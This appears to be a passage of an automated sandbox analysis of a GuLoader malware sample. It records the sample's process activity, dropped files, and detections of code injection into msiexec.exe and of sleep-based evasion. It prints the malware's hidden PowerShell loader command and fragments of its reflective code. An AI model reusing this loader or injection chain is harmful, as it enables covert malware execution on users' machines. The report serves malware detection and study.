Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: vq6jxdGvD6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.3383420098.00000000075C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tinctorially $Uredelig $Frilsning), (Auramin @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Fondens = [AppDomain]::CurrentDomain.GetAssemblies()$global:Pr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kvstelses)), $hoertndhamres).DefineDynamicModule($Anteflexion, $false).DefineType($Unmakes, $Registerlovgivningens, [System.MulticastD

Suspicious powershell command line found

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)"
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Subpilose=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Efterlysningernes.Squ';$Stunning=$Subpilose.SubString(53085,3);.$Stunning($Subpilose)"			Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File created: C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\unshabbily\Toral\vq6jxdGvD6.exe	Jump to dropped file
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File created: C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7284			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2371			Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb129A.tmp\UserInfo.dll			Jump to dropped file
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsb129A.tmp\Banner.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7112	Thread sleep time: -200000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_00406232 FindFirstFileA,FindClose,	0_2_00406232
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004056F7
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	Code function: 0_2_004026F8 FindFirstFileA,	0_2_004026F8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: msiexec.exe, 00000006.00000002.3389908323.000000000890C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2940267464.000000000893C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000893C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000006.00000003.2940267464.000000000893C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3389908323.000000000893C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}

Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	API call chain: ExitProcess graph end node			graph_0-3602
Source: C:\Users\user\Desktop\vq6jxdGvD6.exe	API call chain: ExitProcess graph end node			graph_0-3606

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3860000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

